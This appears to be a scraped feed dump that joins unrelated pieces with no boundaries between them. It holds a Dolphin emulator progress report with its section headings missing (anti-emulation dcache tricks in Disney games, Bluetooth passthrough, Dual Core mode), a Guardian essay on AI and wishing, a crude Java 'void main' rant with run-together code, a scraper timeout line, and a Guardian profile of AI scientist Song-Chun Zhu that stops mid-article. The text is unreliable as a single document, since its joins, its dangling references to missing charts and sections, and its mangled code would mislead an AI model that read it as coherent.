With these updates, our DSP-LLE Recompiler users can finally relax, as it is again is functioning how it always has: slowly, but reliably.
The Disney Trio of Destruction™. Much like the Four Horsemen of the Apocalypse before them, the Trio of Destruction™ are a fearsome group that bring despair in their wake. Once thought to just be ordinary games, we learned very quickly not to underestimate them. First,
Toy Story 3
appeared. Then,
Cars 2
. And finally,
Disney Infinity
. By the year 2013, the unholy trinity was complete.
Each game challenged what was expected of a Wii game. Our efforts started with
Toy Story 3
, as it was the first of the trio to make it to the market in 2010 and did not work in Dolphin! The rest would release before
any
of them worked. However, in 2014,
Toy Story 3
would seemingly be defeated
. A crack in the armor of the inpenetrable three, we thought. Soon the others would fall, we thought.
How foolish we were.
Even after fixing
Toy Story 3
, the other two games would still fail shortly after boot. The failure was so spectacular that everyone thought that Dolphin had to be doing something very wrong. Never did we consider that perhaps we were doing
exactly
what the game wanted us to do.
Over the years, we've been lucky enough to talk to a few developers that worked on various GameCube and Wii games. Most developers are very open toward emulation and
happy
to see us fix emulation bugs in the games they worked so hard on. However, we're going to go out on a limb and say that
Avalanche Software
, the team behind the Trio of Destruction™, weren't so fond of us. Not only did they leave
crude messages hidden in game data for "hackers" to find
, but we also suspect that someone on their team was
actively monitoring us
.
While
Toy Story 3
took a few years to get working, the writing was on the wall for quite some time that
eventually
it would be solved. So, for Avalanche's next two games, we believe that they left a trap specifically designed to defeat Dolphin: the
dcache suicide pill.
It takes (relatively) a lot of time to move data between RAM and the CPU. To speed up memory operations, the GameCube and Wii's CPU has something known as the
dcache
(a special
L1 cache
). This "data cache" holds the contents of recently accessed memory. Any subseqent reads or writes to that memory can be handled by the dcache instead of RAM, which greatly increases performance.
Until 2022
, Dolphin didn't emulate the dcache whatsoever, and just had all memory operations work directly with RAM.
This created a vulnerability.
All Avalanche had to do was tell the CPU to write garbage data into a region of memory where critical game code was stored. However, the game would write
exactly enough
garbage data to fill up the dcache without the CPU automatically flushing the changes to RAM. Then, the game would tell the CPU "never mind" and
invalidate the dcache
. Overwriting critical game code with garbage should leave the game non-functional, but the cache invalidation would prevent the garbage from ever reaching RAM! Dolphin, however, didn't emulate the dcache, so the instruction would just immediately overwrite the critical code in RAM and disable the game.
This trick is dirty, devious, and very effective at stopping Dolphin, but it doesn't really do much else. While Dolphin has ran into
various anti-piracy techniques over the years
, all of them were intended to detect USB/SD loaders on real hardware. The dcache suicide pill
will never trigger on console
, even when using the shoddiest of USB loaders. We can't think of any other reason for it to exist except to stop Dolphin from emulating
Cars 2
and
Disney Infinity
.
Nowadays, those that demand accuracy and those that want performance can both be happy, right? Unfortunately, by the time all of this was solved, the games ran terribly in Dolphin. Even
Toy Story 3
had poor performance, despite it supposedly running
okay
at one point. So what the heck was going on now?
Star Wars: The Clone Wars
earned its right as
the final GameCube game Dolphin booted
by doing something no other GameCube game did. It not only allocated the BATs (Block Address Translations) to non-standard locations, but it also did so dynamically during execution. Dolphin's memory management emulation was built on the idea that it knows where valid virtual memory is going to be in advance, and games that subverted those expectations outright
broke
Dolphin. Supporting Dynamic BATs required a
full rewrite
of Dolphin's memory management emulation.
As tends to happen during a large scale rewrite, there was
so much to do
that a few things fell through the cracks. And while working on Dynamic BATs and preparing the gigantic article on the achievement of booting the last GameCube game, we overlooked something important.
Dynamic BATs
destroyed
performance in
Toy Story 3
, despite it not affecting any other Wii games. To make matters worse, the dcache suicide pills in
Cars 2
and
Disney Infinity
were hacked out
after
Dynamic BATs was finished. As far as we knew, these games were always incredibly slow.
All of the clues were there for us to take on the final mystery, but we didn't put the pieces together until a few months ago, when a user complained that
Toy Story 3
ran a lot better in Dolphin 5.0 than the newer releases. That, followed up with a bisect to Dynamic BATs, prompted some investigation.
With the subtly of a wrecking ball,
Billiard
decided to try to just hack out Dynamic BATs in the latest builds and see if that restored performance. It was a quick and dirty hack that broke a bunch of other games.
But it worked
. Not only was
Toy Story 3
's performance problem resolved, but the entire Trio started running at reasonable speeds!
After some discussion, we had an eureka moment. Dynamic BATs made the games slower because
we started emulating them more accurately
.
The Disney Trio of Destruction™ use the typical memory addresses that any other Wii game would use. However, they
remove the default BATs
and rely on Page Tables in those areas of memory. Memory accesses via Page Tables always goes through our slowmem code, meaning that they don't benefit from fastmem - one of Dolphin's biggest performance optimizations. That's why the Trio was so slow! This is also why simply disabling MMU
didn't speed up the Trio
. Dolphin still supported moving the BATs to different locations, so disabling MMU ended up doing exactly nothing.
Upon seeing the success of the hack,
JosJuice
jumped into action. They had an idea that would allow Dolphin to harness the power of BATs without needing to gut the emulator. After identifying the game code that actually set up the BATs,
JosJuice
forced the games to put them back at the default locations. And since the Trio
all use nearly identical code
, the same patch works in all three games, with the only differences being the instruction locations.
This means that in 2025, you can
finally
emulate
Toy Story 3
,
Cars 2
, and
Disney Infinity
on powerful hardware at
full speed
. These games are still demanding despite being defanged, but a modern gaming PC should be able to handle them. If your PC is
absolutely unhinged
, you can even use
VBI Frequency Override
to push them beyond 60 FPS for high refresh rate gaming!
For those of you that have been waiting for this moment, we hope you enjoy it. It's been a lot of fun investigating and wondering what could be wrong with
Toy Story 3
,
Cars 2
, and
Disney Infinity
.
While our battle with the Disney Trio of Destruction™ is finally over, we have yet to defeat
the final bosses of all final bosses
:
Star Wars: Rogue Squadron II: Rogue Leader
and
Star Wars: Rogue Squadron III: Rebel Strike
. Both of these games
heavily rely on Page Tables
, and a simple patch isn't going to fix either one. Their design was not out of malice, but because Factor 5 had no choice but to use Page Tables if they wanted to tap into the extra memory available in the GameCube's ARAM chip. And this was Factor 5, so
of course they did
. Thus, while we were able to hack the Disney Trio of Destruction™, if we ever want to make the Rogue Squadron games fast, we need to get good at Page Tables.
And for one
final
twist, a developer close to Avalanche Software during the development of these games reached out to us back in 2021. While they couldn't speak on the dcache suicide pill, they claimed that the interesting behaviors in the Trio of Destruction™'s memory managers weren't anti-emulation tricks. Instead, they had simply taken inspiration from
a presentation at GDC 2002 on virtual memory
...
by the Director of Technology at Factor 5
.
The developer that reached out to us had a
pretty good point
, to be honest. After we ran into the dcache suicide pill, we were very quick to blame just about every odd behavior in these games as being anti-Dolphin tricks. In this case, using Page Tables instead of BATs as an anti-emulation trick doesn't really make any sense. After all, replacing the default BATs with Page Tables would have done nothing to stop Dolphin in 2010. The default BATs were hardcoded at the time and would have always been used regardless of what the game requested.
While Wii Remotes (and Balance Boards) connect using standard Bluetooth, they have some quirks that make them difficult to use with other devices. Connecting Wii Remotes works pretty well on Linux, though it's rather spotty on Windows. macOS has problems with even
pairing
Wii Remotes in the first place, as its Bluetooth stack doesn't like Nintendo's non-standard PIN codes. And you can forget Android entirely - while connecting Wii Remotes did work in the far past, it has been prohibited for some time. Sometimes, a Wii Remote will even just refuse to connect for unknown reasons, especially on Windows.
Assuming we can get the Wii Remotes connected, we still have to make some compromises to get things working. Nintendo made the odd decision to use the power-saving Bluetooth feature called “sniff mode” to adjust the Wii remote’s polling rate from 100Hz to 200Hz. Because “sniff mode” is a low level feature generally handled by the Bluetooth stack, regular applications are not able to control it. This effectively halves the rate at which we are able to poll the Wii Remote. Dolphin can duplicate input reports to “simulate” 200Hz and prevent games from getting upset over dropped inputs, but doing so can cause problems with motion control detection. This is why titles like
Sonic and the Secret Rings
can be even more cumbersome when using real Wii Remotes, and why Wii Remote speaker audio is far worse when compared to a real Wii.
Wii Remotes also don't use a standard HID (
USB Human Interface Device
) descriptor, making them unusable as standard game controllers without special drivers. Dolphin mostly works around this by talking with them at the HID layer. Unfortunately, doing this does come with some downsides. For example, other programs running on the host device can disrupt communication. We most often see this with Steam on Windows.
Thankfully, a solution
was
devised almost a decade ago to deal with all of these problems.
In 2016
,
leoetlino
added the ability to "pass through" a Bluetooth adapter directly to the emulated Wii with
a little bit of extra setup
. Bluetooth Passthrough avoids the headaches of dealing with unwieldy operating system Bluetooth stacks by simply giving the emulated Wii full control over the adapter. Because the Wii’s Bluetooth adapter operates using the standard
HCI protocol
, many off the shelf Bluetooth adapters can be used with minimal adjustments. We could have proper 200Hz input polling, support off-brand Wii Remotes that standard Bluetooth stacks can't, and even handle the Wii Remote speaker data properly. You could even attach a real Wii's Bluetooth adapter to a USB port and get perfect or near-perfect Wii Remote support!
Bluetooth Passthrough does have some downsides, though. Because the emulated Wii has full control over the Bluetooth adapter, you can't connect other Bluetooth devices like headphones or controllers unless you have a second adapter. In addition, certain Dolphin features are not accessible when using Bluetooth Passthrough, like save states. Windows users are also required to install a special driver to override the manufacturer's driver and prevent it from loading. Despite these problems, however, Bluetooth Passthrough remains a popular feature because of all the benefits it brings.
Unfortunately, we've recently observed that more and more modern Bluetooth adapters aren't compatible with Bluetooth Passthrough, and it wasn't immediately apparent why.
While helping users out in our Discord,
Billiard
noticed that many of the support requests seemed to be coming from users with Bluetooth adapters built off the Realtek RTL8761 chipset. Once he got his hands on one for himself,
Billiard
quickly found the problem. This particular chipset expects to have its firmware loaded by the operating system every time it is connected. When Dolphin has control over the adapter during Bluetooth Passthrough, the operating system doesn't get the chance to load that necessary firmware!
Billiard
took action to rectify this issue. First,
2506-171
overhauled the Bluetooth Passthrough code to improve general performance through better timing of packets and other minor tweaks. These changes affect
every
adapter. Most importantly, it also separated Dolphin's emulation logic from the LibUSB logic as a step toward fixing the Realtek firmware problem.
2506-330
built upon the previous changes to add the ability to load Realtek firmware. When attempting to use a Realtek adapter with Bluetooth Passthrough for the first time, you will be prompted to allow Dolphin to download the appropriate firmware file from the internet. Once the firmware is downloaded, it is silently loaded on the device, just like the operating system would do. This takes what was previously a completely unsupported chipset and makes it work with Bluetooth Passthrough.
While fixing a single chipset might not seem that significant, given how common it is in modern Bluetooth adapters, this fix has
greatly
improved Bluetooth Passthrough's overall compatibility. Widespread adapters like the
TP-Link Bluetooth 5.3 Nano
and
Asus USB-BT500
can now work with Bluetooth Passthrough!
You may have noticed our settings UI on desktop has been changing over the past few months. This is part of a greater overhaul that we will cover in detail in the future.
In the meantime, a new feature in Dolphin's Qt GUI is the "Map and Calibrate" button.
The Map and Calibrate option allows you to simply map and calibrate your joystick at the same time - just click and rotate the stick clockwise a couple of times. For basically any joystick, you'll get the ranges perfectly matched to that of a GameCube Controller, Classic Controller, or Nunchuck, with but a single click and a spin! For those needing specialized setups, you can still manually map everything normally then calibrate after.
HD Texture Packs are one of the most meaningful enhancements you can throw at GameCube and Wii games. Limited by the storage medium and memory capacity, game developers at the time worked hard to optimize texture resolution. Typically, heroes and main locations were the focus of texture resources, while background elements got the N64 treatment. Those choices look alright at SD resolutions, but when blown up to 4k, the low resolution textures can become extremely obvious.
The biggest fundamental change to how custom textures were loaded was just two years ago, when we quietly added a new asset management system that allowed for loading textures without blocking emulation. This change didn't really amount to much, except that now instead of performance stuttering while textures are loaded, any custom textures that weren't loaded in time would pop-in. Depending on your computer, you might not have noticed this change at all!
The resource manager is a further evolution of this change. It further allows Dolphin to manage custom textures to ensure that HD Texture Packs can work on a wider variety of hardware. The resource manager tracks the requests per frame and orders them based on what was requested last. The newest requests get serviced first, leading to better perceived performance for loading textures. The resource manager also tracks memory usage and can purge textures that haven't been used as much if the machine is low on RAM in order to prevent out of memory issues.
One more bonus is that custom texture loading is now
multithreaded
. This ensures that texture loading no longer needs to borrow resources from Dolphin's main CPU emulation thread and can live on its own CPU core. This greatly improves the performance of loading many textures at once and reduces pop-in on modern multi-core CPUs. Combined with the other improvements the resource manager brings, HD Texture Packs should no longer cause performance issues in most cases.
One of the reasons that various
Mario Kart Wii
online services have a problem with Dolphin users isn't just the ease at which it makes cheating, but that even innocent users can also cause some havoc. While you may think that
lagging
during a race would be a disadvantage, due to the way
Mario Kart Wii
works, it can
actually put you ahead
. During the race, you'll be in a lower position, getting better items and avoiding blue shells. But when you finish, the game only uses your
final time
to calculate your finish position. If you lagged for three seconds over the course of the race and visually finished two seconds behind the leader, you will end up winning the race in the results screen. Yikes.
Modern
Mario Kart Wii
fan servers have protection for this, but it's still an annoying behavior and can definitely cause problems in other games that aren't big enough to get patches to work around Dolphin's quirks.
For this situation and others like it,
Billiard
has brought a new option that will help smooth over small lag spikes.
Correct Time Drift
allows Dolphin to speed up after a lag spike in order to keep Dolphin lined up with real-time progression.
If something causes emulation to slow down or stutter for a short period, Dolphin will use the next opportunity to speed up and catch back up to real time. For temporary issues like network packet drops during NetPlay, shader compilation, and JIT cache flushing, this feature can keep Dolphin locked to the actual time. Outside of certain online games like
Mario Kart Wii
, this can also be useful for speedrunners to ensure that the emulated time is synchronized to the real time even during any minor bobbles in emulation.
Note that some actions will cause Dolphin to abandon time correction. If you disable the speed limiter (holding TAB by default) at any point, Dolphin will not try to slow down for the duration that you are bypassing the speed limit and will choose a new "par time" once the limit is restored.
It has become established within the Dolphin project that Dual Core mode is a hack. It's well known that it is unstable, current developers have called it a hack, we've said it repeatedly here on the blog, and ector (one of Dolphin's founders) has said he
regretted Dual Core
. That really sounds like a hack! However, in the process of writing this article, we consulted with retired Dolphin developers about Dual Core, and had an enlightening conversation.
They told us that Dual Core mode is not a hack. In fact,
Dual Core mode is more like the original hardware than Single Core mode.
And yet, Single Core mode is more accurate.
To explain this, we need to go into detail on what Dual Core mode and Single Core mode actually do.
The following are the processors on the GameCube, and how Dolphin emulates them. The Wii does have some differences, but most of them are minor outside of the addition of the Starlet processor. For simplicity, we will be focusing on the GameCube throughout this section.
Central Processing Unit
- A single PowerPC CPU core. The emulated software lives within this core, and Dolphin, for the most part, isn't aware of what's going on in here. To Dolphin, everything the emulated CPU is doing is just instructions.
A lot of instructions that go by very very fast.
Dolphin translates the instructions (via
recompilation or interpretation
) into something the host CPU can understand, but for the most part it doesn't know what they are doing.
NOTE: Dual Core mode does not split the emulated CPU onto two host CPU cores. We can't do that.
Graphics Processing Unit
Command Processor
- A simple integrated circuit that sits between the CPU and the GPU. The CPU creates lists of commands for the GPU and throws them at the command processor, then carries on with its business. The command processor parses the command list and prepares the GPU to do the work, such as configuring the
TEV unit
and setting up registers. Dolphin emulates the command processor, and assuming a hardware graphics backend is being used, it converts the GameCube GPU commands into commands for the selected graphics API (Vulkan, OpenGL, etc) then passes the work to the host's graphics driver.
TEV/XF/EFB/etc
- Once the driver has commands, the driver will then convert those into the specific instructions and shaders that will run on the host GPU. This is still work for the host CPU, but it is done outside of Dolphin. The actual rendering, and thus most of the GPU emulation, happens on the host GPU (when using a hardware graphics backend).
Digital Signal Processor
- A Macronix DSP that handles various audio processing duties. DSP-HLE is quite light since it technically emulates the
results
of the DSP and not the processor itself. DSP-LLE actually emulates this processor and it is quite heavy.
All of the processors above work
asynchronously
- each processor performs their work independently of all the others. To coordinate and prevent
race conditions
,
synchronization points
must be used, communicating things like "VBlank just happened and we should start a new frame", or "there is work for you waiting in this memory region", or "the work I was assigned is now completed and I am waiting for more".
What is analogous to this in a modern PC? A multi-core processor. While cores may share some resources, they are more or less separate processors that operate asynchronously, and multithreaded applications need to synchronize across their threads. So of course, if a programmer wants to emulate a console with several processors running asynchronously, their
very first thought
would be to have separate threads for each emulated processor. This makes the host hardware behave like the original hardware, plus those threads can spread out across the many CPU cores of the host, better utilizing the host hardware and easing the emulator's CPU requirements. Makes perfect sense!
That's Dual Core mode.
﹡
Dual Core mode isn't a hack, because it closely mimics the original hardware!
The GameCube does not have an operating system. While it does have SDKs and various Nintendo-provided assistance, ultimately, games run on the bare metal, and they have complete control over the system. They can do whatever they want.
And
the software
controls synchronization.
A game following best practices will set a synchronization point whenever there is potential for a race and will not ignore interrupts that the hardware sends back. If done correctly, the asynchronous processors cannot race at all. Games made by Nintendo's development teams, such as
Super Mario Galaxy
, are rock solid
﹡
in Dual Core mode because they safely and thoroughly synchronize.
But game development is hard, and "best practices" are an early casualty of crunch. All too often games run the hardware
a little loose.
For example, a common occurance is that the game will have the CPU send work to the GPU before the game has completely scheduled all of the GPU's resources. If the CPU can return and fill out the rest of those resources before the command processor and GPU are finished with the work they were already assigned, this won't cause any problems. And since each GameCube should behave more or less identically to any other GameCube, if it is fine on the developer's GameCube, it should be fine on
any
GameCube.
However, this is a
race condition
, and coding like this is asking for trouble.
In Dual Core mode, the emulated processors are spread across the host CPU cores, and Dolphin synchronizes
at least
as much as the original console. However, the time it takes for the host cores to do work could be
literally anything
. Modern CPUs adjust clockspeeds on a per-core basis and change their frequency all the time based on heuristics entirely outside of our control, the operating system will constantly move our threads around the host CPU and can decide to put one of our threads to sleep without warning, the CPU could be heterogeneous and another program competing for resources could convince the OS to elevate one of its threads to the big cores and kick one of our threads to the little cores, on and on and on. Race conditions are inherently unsafe on modern hardware!
Even Dolphin
itself
can unbalance the race. Normal emulation scenarios, like a big burst of shader compilation or the emulation threads stalling by saving state or saving a screenshot, are more than enough to change the victor of racing threads.
So if a game lets the chips race, the predictable and consistent race they were expecting on the original hardware is instead an
unpredictable
and
inconsistent
race in Dolphin. And if the race's outcome differs from the original hardware, the game and/or Dolphin may crash!
In Single Core mode, Dolphin does not spread the emulated processors across the host's processors. Instead, it gathers all of those processors and emulates them in
a single host CPU thread
. This gives Dolphin full control over synchronization, allowing Dolphin to force work to be consumed at the same granularity as the original hardware. The host hardware can no longer affect the emulated environment. Even if a game runs a little too loose, even if the host OS gets up in our business, even if syncing with another instance of Dolphin on the other side of the world, Single Core can handle it.
This is not at all how the original hardware works, but the
result
is higher accuracy and stability. The only downside of course, is performance.
This experience has given us a reminder that the developers who founded Dolphin
really knew their stuff
. Splitting the GameCube's processors across host CPU cores is inherently risky. The fact that Dual Core was stable enough to be Dolphin's default for
over fifteen years
is a testament to the capabilities of Dolphin's early developers. Dual Core mode is more or less as good as this implementation can get - as our repeated failures to improve it can attest.
And Dual Core mode was extremely influencial. After Dolphin went open source,
it could run some games at fullspeed
. It was extremely buggy, it required top tier hardware of the time, and it was not a lot of games, but Dolphin
could be used for play
. That was a possibility given to us by Dual Core mode, as Single Core wouldn't reach playable speeds on high end systems for another ten years or so. This was incredibly important in Dolphin's early days, as the ability to play attracted users, which attracted more developers, which attracted more users, giving Dolphin momentum to get off the ground after it went open source. Dolphin would not be where it is now without Dual Core mode.
That being said, times have changed. Our predecessors had to deal with Dual Core mode's instability to get playable performance, but,
as we covered earlier
, we don't have to. Dual Core is no longer necessary for most of our desktop users, and should no longer be the default on desktop.
Then, what has changed now that we know all this? We will never call Dual Core mode a hack ever again.
That is what SyncGPU does. Specifically, in addition to all the synchronization points already in Dual Core, SyncGPU will only allow the processors to race a certain amount of emulated time before it forces a synchronization of its own.
In practice, SyncGPU was neither as fast as Dual Core nor as stable as Single Core, leaving it in a place where it simply didn't matter. But
you already saw the charts
.
To understand how AI will reconfigure humanity, try this German fairytale | Clemens J Setz
Guardian
www.theguardian.com
2025-09-16 07:00:00
Artificial intelligence will replace creativity with something closer to magical wishing. The challenge for future generations will be dealing with the feeling of emptiness that leaves us with In the German fairytale The Fisherman and His Wife, an old man one day catches a strange fish: a talking fl...
I
n the German fairytale The Fisherman and His Wife, an old man one day catches a strange fish: a talking flounder. It turns out that an enchanted prince is trapped inside this fish and that it can therefore grant any wish. The man’s wife, Ilsebill, is delighted and wishes for increasingly excessive things. She turns their miserable hut into a castle, but that is not enough; eventually she wants to become the pope and, finally, God. This enrages the elements; the sea turns dark and she is transformed back into her original impoverished state. The moral of the story: don’t wish for anything you’re not entitled to.
Several variations of this classic fairytale motif are known. Sometimes, the wishes are not so much excessive or offensive to the divine order of the world, but simply clumsy or contradictory, such as in Charles Perrault’s The Ridiculous Wishes. Or, as in WW Jacobs’ 1902 horror story The Monkey’s Paw, their wishes unintentionally harm someone who is actually much closer to them than the object of their desire.
Today, of course, most young people grow up with an enchanted fish in their pocket. They can wish for their homework to be done, and the fish will grant their wishes. They can wish to see any kind of sexual act imaginable, and (if they work around regional age-controls with a VPN) it will be visible. Soon they will be able to wish for films on a subject of their choice and these will be generated within seconds. They wish they had already finished that university essay – and lo and behold, it’s written.
This change in approach will not just upend our relationship as consumers of the creative arts, of written, musical or visual content, it will also reconfigure what it means to be creative and, therefore, what it means to be human. I can imagine that most people in the near future will be able to task an AI representative with all kinds of tiresome interactions – negotiating contracts on their behalf or acting as their agent, receiving and cushioning criticism, collating information, surveying opinions and so on. And the sea will never turn dark.
For now, young Ilsebills sitting in university lecture halls can still expect to be fined when their professor, who grew up in a different era, notices that she has got the enchanted fish to write yet another one of her essays. But that will only last a few more years, until Ilsebill is part of a self-confident majority and most of the professors grew up as Ilsebills themselves. Ilsebill wishes for a boyfriend, a spiritual coach, a therapist – and in an instant she will have one. With each one of these companions, it will feel as if Ilsebill has known them for years, which is literally true.
One could accuse Ilsebill of complicating matters when, like her mythical predecessor, she one day actually wants to become pope and immediately does so in her small world. But if anyone can easily become the pope, then the appeal of being the pope disappears for Generation Ilsebill. Because things only become interesting and desirable when they require a certain amount of resistance, or an obstacle, to be overcome. Ilsebill, however, only knows that type of attractive resistance from learning through prompting – through ever more precise wishing.
Today, young people grow up with an enchanted fish in their pocket … The Fisherman and His Wife.
Illustration: Alamy
She devotes most of her energy in life to fine-tuning the tone of her results. She won’t have acquired her own ear for the tone of a piece of writing, but from gauging the way other people or AIs react to a text that she sent she will know whether the content is appropriate or inappropriate. That way, she learns to make ever more credible wishes. In the past, Ilsebill rarely met people who found things that she said interesting or remarkable. But today everything she discusses with her AI is deemed interesting and remarkable. Finally someone is properly listening, in the way no human partner could do so unconditionally.
And what if the point is reached where all the wish fulfilment leaves Ilsebill feeling empty? What paths are still open to her then?
The first is the path to decadence. We know this mechanism from studying very rich people. In the future, those who have enough money will be able to still afford human therapists or visit the cinema to see films made with real humans. Recently, someone on an AI forum suggested that in the future we should simply have some AI produce masses of child sexual abuse images, so that at least no real children would be harmed in their production. This suggestion was instantly ridiculed, because consumers of child abuse images are not buying just any visual stimulus, but primarily the
certainty
that real children were tortured. They insist on the credible provenance of the product, its “aura”, so to speak. If Ilsebill has enough capital, she will in a way be like them.
The second path is that of small breakaway communities that artificially create difficulties and obstacles for each other, perhaps in the style of old-fashioned sports or hunting clubs, perhaps also in a sect-like manner. They meet in secret or exclusively for an underground event in some basement, which will require them to queue. There’s no goal other than the agonising act of queueing itself. I got this idea from Stanislaw Lem’s novel The Futurological Congress. Today, in 2025, queuing is still free. Later generations might well marvel at this.
The third path is the most likely and the most obvious. Within her fairytale world of wish fulfilment, Ilsebill will discover an overarching principle that colours all her wishes anew, re-weights them, and gives them meaning: guilt. It is well known that guilt is the strongest means of binding a person to a product. A product that one loves but is ashamed to use grows powerfully in the mind and strongly attaches itself to a personality, enveloped in neuroses and real-life substitute virtues to compensate for the ever-increasing guilt.
Ilsebill naturally takes on the enormous ecological guilt of the enormous waste of resources caused by AI. The main guilt is transferred from the giant corporations, the all-pervasive companies, or even the interaction of several states, straight on to Ilsebill, and she now does the logical thing of restricting and punishing herself more and more in the way she goes about her everyday life. Every morning she wakes up with the certainty that every small decision, every smallest wish, will massively damage “the planet”, “the society” or “the future”. She blossoms in her new-found role as saviour, in this system of martyr-like vicarious guilt. This role feels, not without justification, like a battle that will be fought within her for all eternity. It is the magic ingredient that can restore to her life the long-missing flavour of self-sacrifice and inner contradiction. Ilsebill doesn’t protest against the absurd waste of resources, but rather curtails all her freedoms in her private life, such as her supply of adequate nutrients, her water consumption, the number of children she has and her range of movement. In the end she dies, as a kind of Christ of corporations, and takes all her sins to her grave.
The reason why so many European fairytales warned against unwise, ignorant wishes was because like most large, collectively produced complex narratives, their basic theme is individuals coming of age. How does a person grow up, how do they find their place in life, what should they pass on to the next generation, all these questions. Ilsebill, however, at least in this last scenario, no longer has the freedom to answer any of these questions by herself. It will all be decided for her.
As of September 16th, year of our lord 2025, this is no longer the first Java program you need to write.
publicclass Main {publicstaticvoidmain(String[] args){Scanner scanner =newScanner(System.in);System.out.print("What is your name? ");String name = scanner.nextLine();System.out.println("Hello, "+ name);}}
This is.
voidmain(){ var name = IO.readln("What is your name? "); IO.println("Hello, "+ name);}
Good Fucking Riddance.
I'll be nuanced later, we've all earned some catharsis now.
Holy fucking shit did this suck
1
. There is a comments section below. Give your eulogy for that piece of shit sorcerous incantation there or wherever else.
new Scanner(System.in)
and
System.out.println
too. Don't let your sense of dignity hold you back.
Just record yourself giving a guttural scream and post it. Sing a song, do a dance, cast aspersions.
Timed out getting readerview for https://github.com/YuminosukeSato/pyproc
‘I have to do it’: Why one of the world’s most brilliant AI scientists left the US for China
Guardian
www.theguardian.com
2025-09-16 05:00:27
In 2020, after spending half his life in the US, Song-Chun Zhu took a one-way ticket to China. Now he might hold the key to who wins the global AI race By the time Song-Chun Zhu was six years old, he had encountered death more times than he could count. Or so it felt. This was the early 1970s, the w...
Song-chun Zhu at Peking University, July 2025.
Photograph: Sean Gallagher/The Guardian
By the time Song-Chun Zhu was six years old, he had encountered death more times than he could count. Or so it felt. This was the early 1970s, the waning years of the Cultural Revolution, and his father ran a village supply store in rural
China
. There was little to do beyond till the fields and study Mao Zedong at home, and so the shop became a refuge where people could rest, recharge and share tales. Zhu grew up in that shop, absorbing a lifetime’s worth of tragedies: a family friend lost in a car crash, a relative from an untreated illness, stories of suicide or starvation. “That was really tough,” Zhu recalled recently. “People were so poor.”
The young Zhu became obsessed with what people left behind after they died. One day, he came across a book that contained his family genealogy. When he asked the bookkeeper why it included his ancestors’ dates of birth and death but nothing about their lives, the man told him matter of factly that they were peasants, so there was nothing worth recording. The answer terrified Zhu. He resolved that his fate would be different.
Today, at 56, Zhu is one of the world’s leading authorities in artificial intelligence. In 1992, he left China for the US to pursue a PhD in computer science at Harvard. Later, at University of California, Los Angeles (UCLA), he led one of the most prolific AI research centres in the world, won numerous major awards, and attracted prestigious research grants from the Pentagon and the National Science Foundation. He was celebrated for his pioneering research into how machines can spot patterns in data, which helped lay the groundwork for modern AI systems such as ChatGPT and DeepSeek. He and his wife, and their two US-born daughters, lived in a hilltop home on Los Angeles’s Mulholland Drive. He thought he would never leave.
But in August 2020, after 28 years in the US, Zhu astonished his colleagues and friends by suddenly moving back to China, where he took up professorships at two top Beijing universities and a directorship in a state-sponsored AI institute. The Chinese media feted him as a patriot assisting “the motherland” in its race toward artificial intelligence. US lawmakers would later demand to know how funders such as UCLA and the Pentagon had ignored “
concerning signs
” of Zhu’s ties to a geopolitical rival. In 2023, Zhu became a member of China’s top political advisory body, where he proposed that China should treat AI with the same strategic urgency as a nuclear weapons programme.
Zhu’s journey from rural China to the helm of one of the US’s leading AI labs was both improbable and part of a much bigger story. For almost a century, the world’s brightest scientific minds were drawn to the US as the place where they could best advance their research. The work of these new arrivals had helped secure US dominance in technologies such as nuclear weapons, semiconductors and AI. Today, that era seems to be coming to a close. Donald Trump is dismantling the very aspects of US society that once made it so appealing for international talents. He has shut off research funding and attempted to bully top universities, which his
administration
views
as hostile institutions. As US-China tensions have grown, Chinese-born students and professors in the US have faced additional pressures. In a callback to the “red scare” of the 1950s, Chinese students and professors have been
detained and deported
, and had their visas revoked.
Even as the Trump administration lays siege to the foundations of US science, it has been trumpeting its plans to beat its Chinese rival in the field of AI. In July, Trump announced the creation of a $90bn “AI hub” in Pennsylvania, as well as a national blueprint – created in close coordination with Silicon Valley tech leaders – to dominate every aspect of AI globally, from infrastructure to governance. “America is the country that started the AI race,” Trump said. “I’m here today to declare that America is going to win it.” A month later, China unveiled its own
blueprint
, vowing to fuse AI with the marrow of its economy, from factory automation to elder care.
At his lavishly funded Beijing Institute for General Artificial Intelligence, Zhu is one of a handful of individuals who the Chinese government has entrusted to push the AI frontier. His ideas are now shaping undergraduate curriculums and informing policymakers. But his philosophy is strikingly different from the prevailing paradigm in the US. American companies such as OpenAI, Meta and Anthropic have collectively invested billions of dollars on the premise that, equipped with enough data and computing power, models built from neural networks – mathematical systems loosely based on neurons in the brain – could lead humanity to the holy grail of artificial general intelligence (AGI). Broadly speaking, AGI refers to a system that can perform not just narrow tasks, but any task, at a level comparable or superior to the smartest humans. Some people in tech also see AGI as a turning point, when machines become capable of runaway self-improvement. They believe large language models, powered by neural networks, may be five to 10 years away from “takeoff”.
Zhu insists that these ideas are built on sand. A sign of true intelligence, he argues, is the ability to reason towards a goal with minimal inputs – what he calls a “small data, big task” approach, compared with the “big data, small task” approach employed by large language models like ChatGPT. AGI, Zhu’s team has recently said, is characterised by qualities such as resourcefulness in novel situations, social and physical intuition, and an understanding of cause and effect. Large language models, Zhu believes, will never achieve this. Some AI
experts
in the US have similarly questioned the prevailing orthodoxy in Silicon Valley, and their views have grown louder this year as AI progress has slowed and new releases,
like GPT-5
, have disappointed. A different path is needed, and that is what Zhu is working on in Beijing.
It is hard, in the current AI race, to separate out purely intellectual inquiry from questions of geopolitics. Where researchers choose to carry out their work has become a high-stakes matter. Yet for some scientists, the thrill of intellectual inquiry – as well as the prospect of personal glory – may remain more compelling than the pursuit of national advantage. Mark Nitzberg, Zhu’s friend of 20 years and a fellow classmate back in their Harvard days, was surprised by Zhu’s abrupt return to China. “I asked him: ‘Are you sure you want to do this?’” Nitzberg told me. Returning, he told Zhu, could make him a “vector” to help China dominate AI. In Nitzberg’s recollection, Zhu replied: “They are giving me resources that I could never get in the United States. If I want to make this system that I have in my mind, then this is a once in a lifetime opportunity. I have to do it.”
Nearly everyone who knows Zhu in the west asked me the same question: have you been to his office? Tucked behind Weiming Lake on the north side of Peking University campus, it almost seems built to dazzle visitors. A latticed wooden gate marks the entrance, after which you are led into a courtyard residence that Zhu uses for lectures and seminars. There, his assistants gesture you to the end of the hall, where a back door opens on to a breathtaking landscape of rocks, streams and pomegranate trees. Another courtyard residence can be spotted across the stream, on its own island, accessible via a stone footbridge. That is Zhu’s “office”.
